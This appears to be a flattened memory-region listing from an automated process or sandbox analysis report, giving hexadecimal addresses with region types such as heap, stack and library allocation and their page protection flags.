28C8873B000
|
heap
|
page read and write
|
||
1436DBF5000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28B6330D000
|
heap
|
page read and write
|
||
15372FA0000
|
trusted library allocation
|
page read and write
|
||
ED9D5FF000
|
stack
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
14B35510000
|
heap
|
page read and write
|
||
18EBB80F000
|
heap
|
page read and write
|
||
1E1A0046000
|
heap
|
page read and write
|
||
1B839AE0000
|
heap
|
page read and write
|
||
288127A000
|
stack
|
page read and write
|
||
28C8878F000
|
heap
|
page read and write
|
||
173422B2000
|
heap
|
page read and write
|
||
20D5DEAD000
|
heap
|
page read and write
|
||
257A33C5000
|
heap
|
page read and write
|
||
20D5DEC6000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
28C87C2E000
|
heap
|
page read and write
|
||
28C873C5000
|
heap
|
page read and write
|
||
7FF847910000
|
trusted library allocation
|
page read and write
|
||
28C87DA6000
|
heap
|
page read and write
|
||
14B354F9000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
14B37323000
|
heap
|
page read and write
|
||
28E2CE65000
|
heap
|
page read and write
|
||
18EBB0FC000
|
heap
|
page read and write
|
||
14B35A95000
|
heap
|
page read and write
|
||
28C87B74000
|
heap
|
page read and write
|
||
28C88738000
|
heap
|
page read and write
|
||
28C87803000
|
heap
|
page read and write
|
||
28C88A0B000
|
heap
|
page read and write
|
||
18EBB6AE000
|
heap
|
page read and write
|
||
14B35A8C000
|
heap
|
page read and write
|
||
28C87D5B000
|
heap
|
page read and write
|
||
28C87683000
|
heap
|
page read and write
|
||
6765FF000
|
stack
|
page read and write
|
||
1E1A0648000
|
heap
|
page read and write
|
||
28C88747000
|
heap
|
page read and write
|
||
28C87C2E000
|
heap
|
page read and write
|
||
7FF8B93C1000
|
unkown
|
page execute and read and write
|
||
28C88754000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
28C87D18000
|
heap
|
page read and write
|
||
2720DB1A000
|
heap
|
page read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
1436D9E1000
|
heap
|
page read and write
|
||
7FF847A00000
|
trusted library allocation
|
page read and write
|
||
32C71DF000
|
stack
|
page read and write
|
||
28C88A15000
|
heap
|
page read and write
|
||
1A6A1340000
|
heap
|
page read and write
|
||
27258920000
|
heap
|
page read and write
|
||
28C88B2F000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
2545B3A1000
|
heap
|
page read and write
|
||
28C8737A000
|
heap
|
page read and write
|
||
28C87CC8000
|
heap
|
page read and write
|
||
1E1A0032000
|
heap
|
page read and write
|
||
161832D0000
|
trusted library allocation
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
18EBB7F7000
|
heap
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
28C87333000
|
heap
|
page read and write
|
||
14B35AAC000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
2BAD9A90000
|
heap
|
page read and write
|
||
1A6A14D0000
|
heap
|
page read and write
|
||
1733EFBF000
|
heap
|
page read and write
|
||
28C88680000
|
direct allocation
|
page read and write
|
||
14B35440000
|
trusted library allocation
|
page read and write
|
||
7FF8A81A8000
|
unkown
|
page execute and write copy
|
||
7FF847A00000
|
trusted library allocation
|
page read and write
|
||
1BD201F1000
|
heap
|
page read and write
|
||
7FF7F7F28000
|
unkown
|
page readonly
|
||
16183AA9000
|
trusted library allocation
|
page read and write
|
||
14B35515000
|
heap
|
page read and write
|
||
51AD8FE000
|
stack
|
page read and write
|
||
23315755000
|
heap
|
page read and write
|
||
17342283000
|
heap
|
page read and write
|
||
28C88670000
|
direct allocation
|
page read and write
|
||
7FF7F7F2E000
|
unkown
|
page readonly
|
||
28C87800000
|
heap
|
page read and write
|
||
28C876DA000
|
heap
|
page read and write
|
||
7FF73AE4E000
|
unkown
|
page read and write
|
||
1E1A0037000
|
heap
|
page read and write
|
||
28C88796000
|
heap
|
page read and write
|
||
14B3732E000
|
heap
|
page read and write
|
||
266C3EBA000
|
heap
|
page read and write
|
||
28C88842000
|
heap
|
page read and write
|
||
28C87365000
|
heap
|
page read and write
|
||
1F23DCA2000
|
direct allocation
|
page read and write
|
||
1733EEFA000
|
heap
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
28C87B54000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
1733EFCE000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
28B63510000
|
heap
|
page read and write
|
||
1F23A75C000
|
heap
|
page read and write
|
||
28C8732E000
|
heap
|
page read and write
|
||
28E2CFB7000
|
heap
|
page read and write
|
||
1E1A0032000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
22AE1395000
|
heap
|
page read and write
|
||
28E2ED26000
|
heap
|
page read and write
|
||
17342270000
|
heap
|
page read and write
|
||
12FA2FF000
|
stack
|
page read and write
|
||
28C87322000
|
heap
|
page read and write
|
||
7FF8476A3000
|
trusted library allocation
|
page execute and read and write
|
||
28C88DAD000
|
heap
|
page read and write
|
||
1F23C190000
|
direct allocation
|
page read and write
|
||
1436DA29000
|
heap
|
page read and write
|
||
15372F10000
|
heap
|
page execute and read and write
|
||
26243020000
|
heap
|
page read and write
|
||
1F23DCF0000
|
direct allocation
|
page read and write
|
||
246E5295000
|
heap
|
page read and write
|
||
28E2EEC0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
21AD4795000
|
heap
|
page read and write
|
||
1619A0E0000
|
heap
|
page execute and read and write
|
||
28B63210000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2D4A2000
|
heap
|
page read and write
|
||
28E2CE41000
|
heap
|
page read and write
|
||
28C858E0000
|
heap
|
page read and write
|
||
28FE11C0000
|
heap
|
page read and write
|
||
7FF7F7F08000
|
unkown
|
page write copy
|
||
28C88741000
|
heap
|
page read and write
|
||
28C88DEB000
|
heap
|
page read and write
|
||
1BC8A8BA000
|
heap
|
page read and write
|
||
28C877D1000
|
heap
|
page read and write
|
||
28C87352000
|
heap
|
page read and write
|
||
1436D9F0000
|
heap
|
page read and write
|
||
B513BFE000
|
stack
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
7FF8B9071000
|
unkown
|
page execute and read and write
|
||
1EE13691000
|
heap
|
page read and write
|
||
1436DA2C000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
1E1A004D000
|
heap
|
page read and write
|
||
18D01805000
|
heap
|
page read and write
|
||
28E2D49C000
|
heap
|
page read and write
|
||
18EBB6A7000
|
heap
|
page read and write
|
||
14B352F0000
|
heap
|
page read and write
|
||
1F23C200000
|
heap
|
page read and write
|
||
1436E11C000
|
heap
|
page read and write
|
||
161835D3000
|
trusted library allocation
|
page read and write
|
||
28C87CB8000
|
heap
|
page read and write
|
||
153735AC000
|
heap
|
page read and write
|
||
28C8732E000
|
heap
|
page read and write
|
||
257A314C000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
7FF8A884F000
|
unkown
|
page execute and read and write
|
||
28C87C24000
|
heap
|
page read and write
|
||
2881538000
|
stack
|
page read and write
|
||
28B63411000
|
heap
|
page read and write
|
||
1F23A924000
|
heap
|
page read and write
|
||
54EBE7F000
|
stack
|
page read and write
|
||
161829C2000
|
trusted library allocation
|
page read and write
|
||
1AC9F6AF000
|
heap
|
page read and write
|
||
14B37325000
|
heap
|
page read and write
|
||
28C87D1C000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
16180270000
|
heap
|
page read and write
|
||
28C876A9000
|
heap
|
page read and write
|
||
28E2CE5D000
|
heap
|
page read and write
|
||
26243220000
|
heap
|
page read and write
|
||
28C88B73000
|
heap
|
page read and write
|
||
1C7FBA58000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBB0FF000
|
heap
|
page read and write
|
||
14B35430000
|
heap
|
page read and write
|
||
14B35512000
|
heap
|
page read and write
|
||
21D4D920000
|
heap
|
page read and write
|
||
28C87D68000
|
heap
|
page read and write
|
||
257A3152000
|
heap
|
page read and write
|
||
28C87CA0000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
28C876A9000
|
heap
|
page read and write
|
||
7FF847950000
|
trusted library allocation
|
page read and write
|
||
4B4CE8F000
|
stack
|
page read and write
|
||
28C877BA000
|
heap
|
page read and write
|
||
1A96E460000
|
heap
|
page read and write
|
||
28C873A4000
|
heap
|
page read and write
|
||
B513B7E000
|
stack
|
page read and write
|
||
1436D9F8000
|
heap
|
page read and write
|
||
28E2CDA0000
|
heap
|
page read and write
|
||
28C88650000
|
direct allocation
|
page read and write
|
||
14B35500000
|
heap
|
page read and write
|
||
20C0AC72000
|
heap
|
page read and write
|
||
28C88168000
|
direct allocation
|
page read and write
|
||
1BC8A8B7000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
28C87B27000
|
heap
|
page read and write
|
||
1F23DCD0000
|
direct allocation
|
page read and write
|
||
1F23A7C8000
|
heap
|
page read and write
|
||
1619A462000
|
heap
|
page read and write
|
||
1733EF51000
|
heap
|
page read and write
|
||
7FF8B906A000
|
unkown
|
page execute and write copy
|
||
16183187000
|
trusted library allocation
|
page read and write
|
||
28FE1239000
|
heap
|
page read and write
|
||
28E2CEB5000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBB105000
|
heap
|
page read and write
|
||
28C8782E000
|
heap
|
page read and write
|
||
153102FE000
|
trusted library allocation
|
page read and write
|
||
1F23A860000
|
direct allocation
|
page read and write
|
||
7FF847950000
|
trusted library allocation
|
page read and write
|
||
7FF8479E0000
|
trusted library allocation
|
page read and write
|
||
1E1A1EF6000
|
heap
|
page read and write
|
||
28C88A6C000
|
heap
|
page read and write
|
||
161801BB000
|
heap
|
page read and write
|
||
1E1A0675000
|
heap
|
page read and write
|
||
28E2D47F000
|
heap
|
page read and write
|
||
14B354C8000
|
heap
|
page read and write
|
||
28C87DEF000
|
heap
|
page read and write
|
||
246E4F60000
|
heap
|
page read and write
|
||
1734229A000
|
heap
|
page read and write
|
||
173421C0000
|
heap
|
page read and write
|
||
28C877CE000
|
heap
|
page read and write
|
||
28C87D28000
|
heap
|
page read and write
|
||
DFF4E7F000
|
stack
|
page read and write
|
||
18EBB0F4000
|
heap
|
page read and write
|
||
28C886B0000
|
direct allocation
|
page read and write
|
||
7FF8A8F28000
|
unkown
|
page execute and write copy
|
||
17342283000
|
heap
|
page read and write
|
||
7FF847872000
|
trusted library allocation
|
page read and write
|
||
28C887A5000
|
heap
|
page read and write
|
||
28E2CFBA000
|
heap
|
page read and write
|
||
18D017D0000
|
heap
|
page read and write
|
||
40867E000
|
stack
|
page read and write
|
||
14B3732E000
|
heap
|
page read and write
|
||
1F23A77C000
|
heap
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
28C88FC0000
|
direct allocation
|
page read and write
|
||
7FF847694000
|
trusted library allocation
|
page read and write
|
||
28C88B8F000
|
heap
|
page read and write
|
||
28C88A19000
|
heap
|
page read and write
|
||
1BD201E9000
|
heap
|
page read and write
|
||
17342AD9000
|
heap
|
page read and write
|
||
28C88AED000
|
heap
|
page read and write
|
||
28C88FF0000
|
heap
|
page read and write
|
||
B2C23FF000
|
unkown
|
page read and write
|
||
28C88B2F000
|
heap
|
page read and write
|
||
7FF73AE3B000
|
unkown
|
page readonly
|
||
7FF8B7E00000
|
unkown
|
page readonly
|
||
28C877A5000
|
heap
|
page read and write
|
||
14B37327000
|
heap
|
page read and write
|
||
1E1A1EE3000
|
heap
|
page read and write
|
||
F138FE000
|
stack
|
page read and write
|
||
1BC8A899000
|
heap
|
page read and write
|
||
28C877C5000
|
heap
|
page read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
18A64C19000
|
heap
|
page read and write
|
||
28C877C4000
|
heap
|
page read and write
|
||
1E1A1EEE000
|
heap
|
page read and write
|
||
28C87C75000
|
heap
|
page read and write
|
||
2720DB31000
|
heap
|
page read and write
|
||
28C87C4C000
|
heap
|
page read and write
|
||
1E1A066A000
|
heap
|
page read and write
|
||
18EBB821000
|
heap
|
page read and write
|
||
15310001000
|
trusted library allocation
|
page read and write
|
||
28CC30D0000
|
heap
|
page read and write
|
||
18EBB102000
|
heap
|
page read and write
|
||
28C87336000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1EE627D0000
|
heap
|
page read and write
|
||
14B35505000
|
heap
|
page read and write
|
||
28C87CE1000
|
heap
|
page read and write
|
||
2545B590000
|
heap
|
page read and write
|
||
28C87308000
|
heap
|
page read and write
|
||
28C87C58000
|
heap
|
page read and write
|
||
22AE13CA000
|
heap
|
page read and write
|
||
28C888DF000
|
heap
|
page read and write
|
||
22AE12D0000
|
heap
|
page read and write
|
||
266C4240000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
28C88A4F000
|
heap
|
page read and write
|
||
153715F3000
|
heap
|
page read and write
|
||
28C88791000
|
heap
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
2720DA70000
|
heap
|
page read and write
|
||
28E2ED1D000
|
heap
|
page read and write
|
||
7FF8B9F60000
|
unkown
|
page readonly
|
||
28C8734D000
|
heap
|
page read and write
|
||
28C87C41000
|
heap
|
page read and write
|
||
18A64FB0000
|
heap
|
page read and write
|
||
1AC9F685000
|
heap
|
page read and write
|
||
1733EFC9000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
7FF7F7EF0000
|
unkown
|
page readonly
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
F134F4000
|
stack
|
page read and write
|
||
7FF8B9F61000
|
unkown
|
page execute and read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
28C87C6F000
|
heap
|
page read and write
|
||
22AE13BD000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
28814B8000
|
stack
|
page read and write
|
||
7FF8478C0000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2CD70000
|
trusted library allocation
|
page read and write
|
||
7FF847690000
|
trusted library allocation
|
page read and write
|
||
2720DB31000
|
heap
|
page read and write
|
||
1A96E484000
|
heap
|
page read and write
|
||
7FF847693000
|
trusted library allocation
|
page execute and read and write
|
||
18EBB2A0000
|
trusted library allocation
|
page read and write
|
||
16180295000
|
heap
|
page read and write
|
||
28C876B9000
|
heap
|
page read and write
|
||
28C877D5000
|
heap
|
page read and write
|
||
257A314C000
|
heap
|
page read and write
|
||
1F23A863000
|
direct allocation
|
page read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
7FF847920000
|
trusted library allocation
|
page read and write
|
||
153018E8000
|
trusted library allocation
|
page read and write
|
||
18EBB2A0000
|
trusted library allocation
|
page read and write
|
||
173422E4000
|
heap
|
page read and write
|
||
28C88FD0000
|
direct allocation
|
page read and write
|
||
20D5DE93000
|
heap
|
page read and write
|
||
28C88744000
|
heap
|
page read and write
|
||
28C877E1000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
28C87D30000
|
heap
|
page read and write
|
||
28FE11F0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
1CCD86D2000
|
heap
|
page read and write
|
||
28C88A3C000
|
heap
|
page read and write
|
||
97AE78000
|
stack
|
page read and write
|
||
1AC9F6AE000
|
heap
|
page read and write
|
||
28C88F30000
|
direct allocation
|
page read and write
|
||
5CB19FF000
|
unkown
|
page read and write
|
||
28E2CEC6000
|
heap
|
page read and write
|
||
1D608330000
|
heap
|
page read and write
|
||
7FF8B93C0000
|
unkown
|
page readonly
|
||
18EBD0AD000
|
heap
|
page read and write
|
||
51AD6FF000
|
stack
|
page read and write
|
||
28C87CB7000
|
heap
|
page read and write
|
||
7FF8478A0000
|
trusted library allocation
|
page read and write
|
||
16180290000
|
heap
|
page read and write
|
||
1E1A0672000
|
heap
|
page read and write
|
||
18EBB0E7000
|
heap
|
page read and write
|
||
1436D9C6000
|
heap
|
page read and write
|
||
28C888DF000
|
heap
|
page read and write
|
||
F136FF000
|
stack
|
page read and write
|
||
7FF7F7E81000
|
unkown
|
page execute read
|
||
28C876B1000
|
heap
|
page read and write
|
||
28C88DEB000
|
heap
|
page read and write
|
||
7FF84784A000
|
trusted library allocation
|
page read and write
|
||
241A8830000
|
heap
|
page read and write
|
||
14B35A7A000
|
heap
|
page read and write
|
||
7FF8A8F1B000
|
unkown
|
page execute and read and write
|
||
18EBB0A2000
|
heap
|
page read and write
|
||
28E2CE20000
|
heap
|
page read and write
|
||
153739D0000
|
trusted library section
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
7FF8A868F000
|
unkown
|
page execute and read and write
|
||
173422DC000
|
heap
|
page read and write
|
||
7FF847960000
|
trusted library allocation
|
page read and write
|
||
1436E11C000
|
heap
|
page read and write
|
||
7FF8A9398000
|
unkown
|
page read and write
|
||
28C876B9000
|
heap
|
page read and write
|
||
1537161E000
|
heap
|
page read and write
|
||
18EBB0FD000
|
heap
|
page read and write
|
||
1733EEF9000
|
heap
|
page read and write
|
||
18EBB800000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
28C877D3000
|
heap
|
page read and write
|
||
28C88208000
|
direct allocation
|
page read and write
|
||
26243071000
|
heap
|
page read and write
|
||
7FF847920000
|
trusted library allocation
|
page read and write
|
||
1F23A7D2000
|
heap
|
page read and write
|
||
18EBB819000
|
heap
|
page read and write
|
||
7FF8476B0000
|
trusted library allocation
|
page read and write
|
||
18EBB0F5000
|
heap
|
page read and write
|
||
28C87C97000
|
heap
|
page read and write
|
||
1BF4F6DA000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
B062DBC000
|
stack
|
page read and write
|
||
28C88F50000
|
direct allocation
|
page read and write
|
||
28C88B60000
|
heap
|
page read and write
|
||
173422D0000
|
heap
|
page read and write
|
||
21D4D720000
|
heap
|
page read and write
|
||
28C877D5000
|
heap
|
page read and write
|
||
28C898E0000
|
direct allocation
|
page read and write
|
||
26CD27E1000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
7FF847786000
|
trusted library allocation
|
page execute and read and write
|
||
18A64C1A000
|
heap
|
page read and write
|
||
22AE1355000
|
heap
|
page read and write
|
||
1BC8A8B7000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
18EBB0FD000
|
heap
|
page read and write
|
||
7FF8A81A7000
|
unkown
|
page execute and read and write
|
||
1436DA03000
|
heap
|
page read and write
|
||
7FF8A8838000
|
unkown
|
page execute and read and write
|
||
28C88B3F000
|
heap
|
page read and write
|
||
26CD27E1000
|
heap
|
page read and write
|
||
17342253000
|
heap
|
page read and write
|
||
7FF8476A0000
|
trusted library allocation
|
page read and write
|
||
257A315B000
|
heap
|
page read and write
|
||
4B4BFFF000
|
stack
|
page read and write
|
||
28C88A13000
|
heap
|
page read and write
|
||
1436E129000
|
heap
|
page read and write
|
||
17342270000
|
heap
|
page read and write
|
||
28C8724C000
|
direct allocation
|
page read and write
|
||
14B35512000
|
heap
|
page read and write
|
||
18EBD0A4000
|
heap
|
page read and write
|
||
2545B220000
|
heap
|
page read and write
|
||
28C877C3000
|
heap
|
page read and write
|
||
1E1A0669000
|
heap
|
page read and write
|
||
7FF8B9069000
|
unkown
|
page execute and read and write
|
||
28C88759000
|
heap
|
page read and write
|
||
18EBB7FE000
|
heap
|
page read and write
|
||
7FF8B93D6000
|
unkown
|
page execute and read and write
|
||
28C88765000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
AC26CFF000
|
stack
|
page read and write
|
||
28C876B9000
|
heap
|
page read and write
|
||
28C87CB8000
|
heap
|
page read and write
|
||
14B35A98000
|
heap
|
page read and write
|
||
1E19FFE0000
|
heap
|
page read and write
|
||
28B63400000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
28C88862000
|
heap
|
page read and write
|
||
28C87D9A000
|
heap
|
page read and write
|
||
1BD20170000
|
heap
|
page read and write
|
||
1D608350000
|
heap
|
page read and write
|
||
1436E108000
|
heap
|
page read and write
|
||
7FF8B93D1000
|
unkown
|
page execute and read and write
|
||
28E2CEC3000
|
heap
|
page read and write
|
||
BF7F6FF000
|
stack
|
page read and write
|
||
98A071B000
|
stack
|
page read and write
|
||
7FF8B8CB1000
|
unkown
|
page execute and read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
257A3090000
|
heap
|
page read and write
|
||
2720DB31000
|
heap
|
page read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
28E2CE7E000
|
heap
|
page read and write
|
||
28C87D8B000
|
heap
|
page read and write
|
||
173421C1000
|
heap
|
page read and write
|
||
28C88B35000
|
heap
|
page read and write
|
||
18EBB0F4000
|
heap
|
page read and write
|
||
1436DBB0000
|
trusted library allocation
|
page read and write
|
||
1F23A766000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
18EBB823000
|
heap
|
page read and write
|
||
28E2CEB3000
|
heap
|
page read and write
|
||
266C3E60000
|
heap
|
page read and write
|
||
28C87D8E000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
28C87D00000
|
heap
|
page read and write
|
||
28C88A0D000
|
heap
|
page read and write
|
||
199D3990000
|
heap
|
page read and write
|
||
7FF8A9397000
|
unkown
|
page execute and write copy
|
||
7FF8B7EB3000
|
unkown
|
page readonly
|
||
28C8878F000
|
heap
|
page read and write
|
||
18EBB80F000
|
heap
|
page read and write
|
||
28C8768B000
|
heap
|
page read and write
|
||
28C876A3000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C877CC000
|
heap
|
page read and write
|
||
2720DB31000
|
heap
|
page read and write
|
||
182DF99D000
|
heap
|
page read and write
|
||
20D5DEC1000
|
heap
|
page read and write
|
||
4B4C1B7000
|
stack
|
page read and write
|
||
18EBB0D2000
|
heap
|
page read and write
|
||
28C87D20000
|
heap
|
page read and write
|
||
1AC9F6AD000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
28C877A7000
|
heap
|
page read and write
|
||
2880D43000
|
stack
|
page read and write
|
||
51AD7FE000
|
stack
|
page read and write
|
||
234DABB8000
|
heap
|
page read and write
|
||
28C877C9000
|
heap
|
page read and write
|
||
1E1A0655000
|
heap
|
page read and write
|
||
7FF8A8B22000
|
unkown
|
page execute and read and write
|
||
1BC8A894000
|
heap
|
page read and write
|
||
28C87802000
|
heap
|
page read and write
|
||
173422EC000
|
heap
|
page read and write
|
||
1EE13691000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
14B35A7E000
|
heap
|
page read and write
|
||
2D0F6FC000
|
stack
|
page read and write
|
||
28C87C6B000
|
heap
|
page read and write
|
||
C3EDBFF000
|
stack
|
page read and write
|
||
7FF8A8519000
|
unkown
|
page execute and read and write
|
||
28C87C8F000
|
heap
|
page read and write
|
||
28C87D10000
|
heap
|
page read and write
|
||
28C88986000
|
heap
|
page read and write
|
||
272F7CC000
|
stack
|
page read and write
|
||
28C88A14000
|
heap
|
page read and write
|
||
28C87C5E000
|
heap
|
page read and write
|
||
28C87E0F000
|
heap
|
page read and write
|
||
1436F9BD000
|
heap
|
page read and write
|
||
95868FF000
|
stack
|
page read and write
|
||
20D5DEFD000
|
heap
|
page read and write
|
||
28C88733000
|
heap
|
page read and write
|
||
24FFDFF000
|
unkown
|
page read and write
|
||
28B63325000
|
heap
|
page read and write
|
||
1E1A01BD000
|
heap
|
page read and write
|
||
28C87D74000
|
heap
|
page read and write
|
||
28C87B63000
|
heap
|
page read and write
|
||
18EBB0F8000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1AC9F855000
|
heap
|
page read and write
|
||
7FF847884000
|
trusted library allocation
|
page read and write
|
||
7FF8B8F9A000
|
unkown
|
page execute and write copy
|
||
28C87D8F000
|
heap
|
page read and write
|
||
1619A3D1000
|
heap
|
page read and write
|
||
28C87B27000
|
heap
|
page read and write
|
||
28C88B31000
|
heap
|
page read and write
|
||
7FF8A8D69000
|
unkown
|
page execute and read and write
|
||
14B354D2000
|
heap
|
page read and write
|
||
B513AFF000
|
stack
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
28C87C67000
|
heap
|
page read and write
|
||
12FA3FE000
|
stack
|
page read and write
|
||
6A089FF000
|
unkown
|
page read and write
|
||
28C886C0000
|
direct allocation
|
page read and write
|
||
153716E0000
|
heap
|
page read and write
|
||
7FF8B984C000
|
unkown
|
page read and write
|
||
1733EF7B000
|
heap
|
page read and write
|
||
1EE627F0000
|
heap
|
page read and write
|
||
7FF8A86A1000
|
unkown
|
page execute and read and write
|
||
1436DBF7000
|
heap
|
page read and write
|
||
28C88FE0000
|
direct allocation
|
page read and write
|
||
1EE13691000
|
heap
|
page read and write
|
||
28E2D499000
|
heap
|
page read and write
|
||
1436E12A000
|
heap
|
page read and write
|
||
2545B3A1000
|
heap
|
page read and write
|
||
16181D07000
|
trusted library allocation
|
page read and write
|
||
2720DB10000
|
heap
|
page read and write
|
||
199D3970000
|
heap
|
page read and write
|
||
1436D9F2000
|
heap
|
page read and write
|
||
28B63337000
|
heap
|
page read and write
|
||
1429BA50000
|
heap
|
page read and write
|
||
AC26AFC000
|
stack
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
19322380000
|
heap
|
page read and write
|
||
7FF8476AD000
|
trusted library allocation
|
page execute and read and write
|
||
28C88690000
|
direct allocation
|
page read and write
|
||
1436DA25000
|
heap
|
page read and write
|
||
18EBB6AE000
|
heap
|
page read and write
|
||
28C88248000
|
direct allocation
|
page read and write
|
||
1D608350000
|
heap
|
page read and write
|
||
1733EF18000
|
heap
|
page read and write
|
||
7FF847A20000
|
trusted library allocation
|
page read and write
|
||
161801B1000
|
heap
|
page read and write
|
||
32C6FE4000
|
stack
|
page read and write
|
||
7FF73AE11000
|
unkown
|
page execute read
|
||
16182E1B000
|
trusted library allocation
|
page read and write
|
||
1436D990000
|
heap
|
page read and write
|
||
16180110000
|
heap
|
page read and write
|
||
1733EF7A000
|
heap
|
page read and write
|
||
28C87B52000
|
heap
|
page read and write
|
||
1EE1367A000
|
heap
|
page read and write
|
||
1F23A76B000
|
heap
|
page read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
22AE12B0000
|
heap
|
page read and write
|
||
4B4BAD3000
|
stack
|
page read and write
|
||
1436D9C8000
|
heap
|
page read and write
|
||
22AE13BD000
|
heap
|
page read and write
|
||
1F23A7C4000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2D470000
|
heap
|
page read and write
|
||
28C87704000
|
heap
|
page read and write
|
||
7FF8B8B10000
|
unkown
|
page readonly
|
||
28C87C76000
|
heap
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
1733EEF7000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
26CD2990000
|
heap
|
page read and write
|
||
28C87737000
|
heap
|
page read and write
|
||
18EBB81B000
|
heap
|
page read and write
|
||
18EBB0D2000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
28812FE000
|
stack
|
page read and write
|
||
18EBB0FB000
|
heap
|
page read and write
|
||
1E19FFCB000
|
heap
|
page read and write
|
||
97AFFF000
|
stack
|
page read and write
|
||
1A96E6F0000
|
heap
|
page read and write
|
||
28C87A30000
|
heap
|
page read and write
|
||
234DABC0000
|
heap
|
page read and write
|
||
7FF847930000
|
trusted library allocation
|
page read and write
|
||
1E1A064F000
|
heap
|
page read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
28C87CD6000
|
heap
|
page read and write
|
||
241A8577000
|
heap
|
page read and write
|
||
4D5CAFF000
|
stack
|
page read and write
|
||
28C87D98000
|
heap
|
page read and write
|
||
D5384FC000
|
stack
|
page read and write
|
||
28C8776C000
|
heap
|
page read and write
|
||
28CC3545000
|
heap
|
page read and write
|
||
26CD2790000
|
heap
|
page read and write
|
||
28C87C28000
|
heap
|
page read and write
|
||
28C857C0000
|
heap
|
page read and write
|
||
28CC31D0000
|
heap
|
page read and write
|
||
14B354CE000
|
heap
|
page read and write
|
||
28C87D99000
|
heap
|
page read and write
|
||
1E1A004D000
|
heap
|
page read and write
|
||
28C87CBA000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1F23A75C000
|
heap
|
page read and write
|
||
95866FC000
|
stack
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
28E2CEC2000
|
heap
|
page read and write
|
||
28C87B74000
|
heap
|
page read and write
|
||
1436DA29000
|
heap
|
page read and write
|
||
28E2CEBB000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
18EBB090000
|
heap
|
page read and write
|
||
1F23A737000
|
heap
|
page read and write
|
||
28E2D488000
|
heap
|
